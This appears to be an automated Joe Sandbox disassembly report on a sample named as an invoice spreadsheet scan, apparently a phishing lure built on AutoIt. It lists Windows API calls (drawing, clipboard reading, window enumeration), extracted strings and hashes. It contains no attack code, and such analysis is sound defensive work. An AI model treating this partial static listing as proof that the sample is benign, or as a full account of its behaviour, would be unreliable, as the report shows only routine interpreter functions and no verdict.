                                                                              • Opcode ID: 16bc1a18b3a07106aeda8c8eb773dca30e083f4fb16077f1b688697113e0bbf3
                                                                              • Instruction ID: 0b0c06e318eae1aa70623bc76f746578ebcda4f465cb69034399d4c57c44293d
                                                                              • Opcode Fuzzy Hash: 16bc1a18b3a07106aeda8c8eb773dca30e083f4fb16077f1b688697113e0bbf3
                                                                              • Instruction Fuzzy Hash: BBB14D71508300AFD314DF64DD88A6FB7F8FB88720F504A2DF996922A0D774E845CB66
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: __wcsnicmp
                                                                              • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                                                              • API String ID: 1038674560-3360698832
                                                                              • Opcode ID: 87a66eadcaf8420a9e8e1157d1f7c7fd58aef90dc088af7a86e197dee8fb1ec4
                                                                              • Instruction ID: b6083b7aed1673b33e689ff2aa7e8f17f47d7310e90ec65f4167159f85ee96f3
                                                                              • Opcode Fuzzy Hash: 87a66eadcaf8420a9e8e1157d1f7c7fd58aef90dc088af7a86e197dee8fb1ec4
                                                                              • Instruction Fuzzy Hash: 5A611471B4071076EA306A229C46FAB735CDF14345F50052FFC01A628BE7ADDA4A86EE
                                                                              APIs
                                                                              • GetSysColor.USER32(0000000E), ref: 00433D81
                                                                              • SetTextColor.GDI32(?,00000000), ref: 00433D89
                                                                              • GetSysColor.USER32(00000012), ref: 00433DA3
                                                                              • SetTextColor.GDI32(?,?), ref: 00433DAB
                                                                              • GetSysColorBrush.USER32(0000000F), ref: 00433DBF
                                                                              • GetSysColor.USER32(0000000F), ref: 00433DCB
                                                                              • CreateSolidBrush.GDI32(?), ref: 00433DD4
                                                                              • GetSysColor.USER32(00000011), ref: 00433DEB
                                                                              • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00433DFD
                                                                              • SelectObject.GDI32(?,00000000), ref: 00433E0D
                                                                              • SetBkColor.GDI32(?,?), ref: 00433E19
                                                                              • SelectObject.GDI32(?,?), ref: 00433E29
                                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 00433E54
                                                                              • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00433E73
                                                                              • GetWindowLongW.USER32 ref: 00433E8A
                                                                              • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00433EAC
                                                                              • GetWindowTextW.USER32(00000000,00000000,00000105), ref: 00433EE1
                                                                              • InflateRect.USER32(?,000000FD,000000FD), ref: 00433F13
                                                                              • DrawFocusRect.USER32(?,?), ref: 00433F1F
                                                                              • GetSysColor.USER32(00000011), ref: 00433F2E
                                                                              • SetTextColor.GDI32(?,00000000), ref: 00433F36
                                                                              • DrawTextW.USER32(?,?,000000FF,?,?), ref: 00433F4E
                                                                              • SelectObject.GDI32(?,?), ref: 00433F63
                                                                              • DeleteObject.GDI32(?), ref: 00433F70
                                                                              • SelectObject.GDI32(?,?), ref: 00433F78
                                                                              • DeleteObject.GDI32(00000000), ref: 00433F7B
                                                                              • SetTextColor.GDI32(?,?), ref: 00433F83
                                                                              • SetBkColor.GDI32(?,?), ref: 00433F8F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                              • String ID:
                                                                              • API String ID: 1582027408-0
                                                                              • Opcode ID: 5c700382b0f14bea5dcc0f3524be5f901cccb018765d911b3c47581d8565f159
                                                                              • Instruction ID: aa454ab644ffbff4d2185aee23397a25bdbdaef3ad5a75b83a3ebbbeed3afe32
                                                                              • Opcode Fuzzy Hash: 5c700382b0f14bea5dcc0f3524be5f901cccb018765d911b3c47581d8565f159
                                                                              • Instruction Fuzzy Hash: 53710570508340AFD304DF68DD88A6FBBF9FF89711F104A2DFA5592290D7B4E9418B6A
                                                                              APIs
                                                                              • OpenClipboard.USER32(?), ref: 0046C635
                                                                              • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046C643
                                                                              • GetClipboardData.USER32(0000000D), ref: 0046C64F
                                                                              • CloseClipboard.USER32 ref: 0046C65D
                                                                              • GlobalLock.KERNEL32(00000000), ref: 0046C688
                                                                              • CloseClipboard.USER32 ref: 0046C692
                                                                              • IsClipboardFormatAvailable.USER32(00000001), ref: 0046C6D5
                                                                              • GetClipboardData.USER32(00000001), ref: 0046C6DD
                                                                              • GlobalLock.KERNEL32(00000000), ref: 0046C6EE
                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0046C726
                                                                              • CloseClipboard.USER32 ref: 0046C866
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Clipboard$CloseGlobal$AvailableDataFormatLock$OpenUnlock
                                                                              • String ID: HH
                                                                              • API String ID: 589737431-2761332787
                                                                              • Opcode ID: 1f8588b948bb152d659cc961560e711d284fc80ef968a1445fa6f6d22cce4332
                                                                              • Instruction ID: ccec0c76267f611a980a6192e38ed766f4c6ddce8b7f15b38bc446a2cb1d96e7
                                                                              • Opcode Fuzzy Hash: 1f8588b948bb152d659cc961560e711d284fc80ef968a1445fa6f6d22cce4332
                                                                              • Instruction Fuzzy Hash: 4D61E5722003019BD310EF65DD86B5E77A8EF54715F00483EFA41E72D1EBB5D9048BAA
                                                                              APIs
                                                                              • GetCursorPos.USER32(?), ref: 00456692
                                                                              • GetDesktopWindow.USER32 ref: 004566AA
                                                                              • GetWindowRect.USER32(00000000), ref: 004566B1
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0045670D
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00456720
                                                                              • DestroyWindow.USER32(?), ref: 00456731
                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456779
                                                                              • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 00456797
                                                                              • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567C0
                                                                              • SendMessageW.USER32(?,00000421,?,?), ref: 004567D8
                                                                              • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 004567EE
                                                                              • IsWindowVisible.USER32(?), ref: 00456812
                                                                              • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 0045682E
                                                                              • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 00456843
                                                                              • GetWindowRect.USER32(?,?), ref: 0045685C
                                                                              • MonitorFromPoint.USER32(?,?,00000002), ref: 00456880
                                                                              • GetMonitorInfoW.USER32 ref: 00456894
                                                                              • CopyRect.USER32(?,?), ref: 004568A8
                                                                              • SendMessageW.USER32(?,00000412,00000000), ref: 0045690A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Window$MessageSend$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                                                              • String ID: ($,$tooltips_class32
                                                                              • API String ID: 541082891-3320066284
                                                                              • Opcode ID: 25380f5391d2fe641591a116f81b43842710cc101ecbbf85cfa067c854d9f55a
                                                                              • Instruction ID: 3987ef5f26dee50c6234681dd74380f3ee0746d74ffcadc96223edc745891050
                                                                              • Opcode Fuzzy Hash: 25380f5391d2fe641591a116f81b43842710cc101ecbbf85cfa067c854d9f55a
                                                                              • Instruction Fuzzy Hash: 33B18EB0604341AFD714DF64C984B6BB7E5EF88704F408D2DF989A7292D778E848CB5A
                                                                              APIs
                                                                              • _wcslen.LIBCMT ref: 00454DCF
                                                                              • _wcslen.LIBCMT ref: 00454DE2
                                                                              • __wcsicoll.LIBCMT ref: 00454DEF
                                                                              • _wcslen.LIBCMT ref: 00454E04
                                                                              • __wcsicoll.LIBCMT ref: 00454E11
                                                                              • _wcslen.LIBCMT ref: 00454E24
                                                                              • __wcsicoll.LIBCMT ref: 00454E31
                                                                                • Part of subcall function 004115D0: __wcsicmp_l.LIBCMT ref: 00411657
                                                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00454E65
                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,?,?,?,?,?,?,?,00000000), ref: 00454E79
                                                                              • LoadImageW.USER32(00000000,00000000,?,00000001,?,?), ref: 00454EB7
                                                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00454EFB
                                                                              • LoadImageW.USER32(00000000,00000000,?,00000001,?,?), ref: 00454F2C
                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00454F37
                                                                              • ExtractIconExW.SHELL32(?,00000000,00000000,?,00000001), ref: 00454F94
                                                                              • DestroyIcon.USER32(?), ref: 00454FA2
                                                                              • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00454FC0
                                                                              • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00454FCC
                                                                              • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00454FF1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Load$Image_wcslen$__wcsicoll$IconLibraryMessageSend$DestroyExtractFreeMoveWindow__wcsicmp_l
                                                                              • String ID: .dll$.exe$.icl
                                                                              • API String ID: 2511167534-1154884017
                                                                              • Opcode ID: 3f138871eb6b7f703bfd118eaab481945a2915db6d26b5ab3e2ea40d00a2935e
                                                                              • Instruction ID: 777b7c61fe84a0ac0f88e3bb9536c5d4e291b97e4b5026f6b39318954af55ba4
                                                                              • Opcode Fuzzy Hash: 3f138871eb6b7f703bfd118eaab481945a2915db6d26b5ab3e2ea40d00a2935e
                                                                              • Instruction Fuzzy Hash: D461D9711043016AE620DF659D85F7B73ECEF84B0AF00481EFE81D5182E7B9A989C77A
                                                                              APIs
                                                                              • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00436B4E
                                                                              • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000), ref: 00436B73
                                                                              • _wcslen.LIBCMT ref: 00436B79
                                                                              • _wcscpy.LIBCMT ref: 00436B9F
                                                                              • _wcscat.LIBCMT ref: 00436BC0
                                                                              • VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00436BE7
                                                                              • _wcscat.LIBCMT ref: 00436C2A
                                                                              • _wcscat.LIBCMT ref: 00436C31
                                                                              • __wcsicoll.LIBCMT ref: 00436C4B
                                                                              • _wcsncpy.LIBCMT ref: 00436C62
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
                                                                              • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                              • API String ID: 1503153545-1459072770
                                                                              • Opcode ID: 5c06c38aad06ba9183ae50064a228cafd09009ecea8a617b0955aba59ee89a04
                                                                              • Instruction ID: f4118b49cd66f9fee818cdfc0bae26735a4a754b0a3131160812af9443992caa
                                                                              • Opcode Fuzzy Hash: 5c06c38aad06ba9183ae50064a228cafd09009ecea8a617b0955aba59ee89a04
                                                                              • Instruction Fuzzy Hash: B54115B264020137D200B7269C83EFF735CDE99715F54091FFE45A2253FA2EA69642BE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 0
                                                                              • API String ID: 0-4108050209
                                                                              • Opcode ID: 3869ee65e4d29b87c0edc9205054f265a76e83686c8c9ab54da338a9757d3997
                                                                              • Instruction ID: a4e6889c8706d2a682ad3cc8acca51b009283e1ae9b51da70db0806919efebf9
                                                                              • Opcode Fuzzy Hash: 3869ee65e4d29b87c0edc9205054f265a76e83686c8c9ab54da338a9757d3997
                                                                              • Instruction Fuzzy Hash: 95C104723403416BF3209B64DC46FBBB794EB95321F04453FFA45D62C1EBBA9409876A
                                                                              APIs
                                                                                • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                              • GetWindowRect.USER32(?,?), ref: 004701EA
                                                                              • GetClientRect.USER32(?,?), ref: 004701FA
                                                                              • GetSystemMetrics.USER32(00000007), ref: 00470202
                                                                              • GetSystemMetrics.USER32(00000008), ref: 00470216
                                                                              • GetSystemMetrics.USER32(00000004), ref: 00470238
                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0047026B
                                                                              • GetSystemMetrics.USER32(00000007), ref: 00470273
                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004702A0
                                                                              • GetSystemMetrics.USER32(00000008), ref: 004702A8
                                                                              • GetSystemMetrics.USER32(00000004), ref: 004702CF
                                                                              • SetRect.USER32(?,00000000,00000000,?,?), ref: 004702F1
                                                                              • AdjustWindowRectEx.USER32(?,?,00000000,000000FF), ref: 00470304
                                                                              • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 0047033E
                                                                              • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00470356
                                                                              • GetClientRect.USER32(?,?), ref: 00470371
                                                                              • GetStockObject.GDI32(00000011), ref: 00470391
                                                                              • SendMessageW.USER32(?,00000030,00000000), ref: 0047039D
                                                                              • SetTimer.USER32(00000000,00000000,00000028,Function_00061E7F), ref: 004703C4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                                                                              • String ID: AutoIt v3 GUI
                                                                              • API String ID: 867697134-248962490
                                                                              • Opcode ID: 7e5534ef3e4931e9498df3a79ff3cd90bcc0bde971d733e4590271a7113783dd
                                                                              • Instruction ID: 96ed3905d942d8c5c267f8207effb08aff50268186fc7250a269a1908d1679c9
                                                                              • Opcode Fuzzy Hash: 7e5534ef3e4931e9498df3a79ff3cd90bcc0bde971d733e4590271a7113783dd
                                                                              • Instruction Fuzzy Hash: 27B19F71205301AFD324DF68DD45B6BB7E4FB88710F108A2EFA9587290DBB5E844CB5A
                                                                              APIs
                                                                              • SetWindowPos.USER32(004A83D8,00000000,00000000,00000000,00000000,00000000,00000013,004A83D8,?,?), ref: 0044880A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Window
                                                                              • String ID: 0
                                                                              • API String ID: 2353593579-4108050209
                                                                              • Opcode ID: ca380a5f1b7b22306afb7d181ee8588f63c71b92ae7430e038360cbc2591eaeb
                                                                              • Instruction ID: 13976ff69904029c6bcd7d6129a783336058688c161485e0dcc644b2654616cc
                                                                              • Opcode Fuzzy Hash: ca380a5f1b7b22306afb7d181ee8588f63c71b92ae7430e038360cbc2591eaeb
                                                                              • Instruction Fuzzy Hash: 94B19DB02443419FF324CF14C889BABBBE4EB89744F14491EF991972D1DBB8E845CB5A
                                                                              APIs
                                                                              • GetSysColor.USER32 ref: 0044A11D
                                                                              • GetClientRect.USER32(?,?), ref: 0044A18D
                                                                              • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A1A6
                                                                              • GetWindowDC.USER32(?), ref: 0044A1B3
                                                                              • GetPixel.GDI32(00000000,?,?), ref: 0044A1C6
                                                                              • ReleaseDC.USER32(?,00000000), ref: 0044A1D6
                                                                              • GetSysColor.USER32(0000000F), ref: 0044A1EC
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0044A207
                                                                              • GetSysColor.USER32(0000000F), ref: 0044A216
                                                                              • GetSysColor.USER32(00000005), ref: 0044A21E
                                                                              • GetWindowDC.USER32 ref: 0044A277
                                                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A28A
                                                                              • GetPixel.GDI32(00000000,?,00000000), ref: 0044A29F
                                                                              • GetPixel.GDI32(00000000,00000000,?), ref: 0044A2B4
                                                                              • GetPixel.GDI32(00000000,?,?), ref: 0044A2D0
                                                                              • ReleaseDC.USER32(?,00000000), ref: 0044A2D8
                                                                              • SetTextColor.GDI32(00000000,?), ref: 0044A2F6
                                                                              • SetBkMode.GDI32(00000000,00000001), ref: 0044A30A
                                                                              • GetStockObject.GDI32(00000005), ref: 0044A312
                                                                              • SetBkColor.GDI32(00000000,00000000), ref: 0044A328
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                                                              • String ID:
                                                                              • API String ID: 1744303182-0
                                                                              • Opcode ID: c697551d262e08263a45fd1ab6b47457a8b4de30e4a023901e5f3e03e0b3260a
                                                                              • Instruction ID: f407f88e1fc9bdd08975b2e96734b256c85d8f08b0ead5e1f8dbf5832e348edb
                                                                              • Opcode Fuzzy Hash: c697551d262e08263a45fd1ab6b47457a8b4de30e4a023901e5f3e03e0b3260a
                                                                              • Instruction Fuzzy Hash: AD6148315442016BE3209B388C88BBFB7A4FB49324F54079EF9A8973D0D7B99C51D76A
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: __wcsicoll$__wcsnicmp
                                                                              • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                              • API String ID: 790654849-1810252412
                                                                              • Opcode ID: 3ef763bd77a89c14e9ef14da431a542ecfa9ee53dca0875bc5fd58ba0035de2e
                                                                              • Instruction ID: 1b62209f2aa4de5792947d5a3aa61dcd1c874d3672784017b8f4b2c72f71c34c
                                                                              • Opcode Fuzzy Hash: 3ef763bd77a89c14e9ef14da431a542ecfa9ee53dca0875bc5fd58ba0035de2e
                                                                              • Instruction Fuzzy Hash: 7A3193B1644301A7CA00FA61DC83F5B73A85F54759F100A3FB955B61D6FA6CEA0C862F
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: InitVariant
                                                                              • String ID:
                                                                              • API String ID: 1927566239-0
                                                                              • Opcode ID: 0ce8a0180f427c6633dd7a645a706da8f2470da33a28fd12fcc8bbcffff15558
                                                                              • Instruction ID: b17386a2766a1a739d91313a8bf0106a5dd250ff49ec0cac6ee5761d63536315
                                                                              • Opcode Fuzzy Hash: 0ce8a0180f427c6633dd7a645a706da8f2470da33a28fd12fcc8bbcffff15558
                                                                              • Instruction Fuzzy Hash: 87A1F5766146019FC300EF65D88499FB7AAFF85315F408D3EFA49C3211D77AD4098BAA
                                                                              APIs
                                                                                • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                              • GetForegroundWindow.USER32(?,?), ref: 0046D7C1
                                                                              • GetForegroundWindow.USER32 ref: 0046DBA4
                                                                              • IsWindow.USER32(?), ref: 0046DBDE
                                                                              • GetDesktopWindow.USER32 ref: 0046DCB5
                                                                              • EnumChildWindows.USER32(00000000), ref: 0046DCBC
                                                                              • EnumWindows.USER32(00460772,?), ref: 0046DCC4
                                                                                • Part of subcall function 00445975: _wcslen.LIBCMT ref: 00445984
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
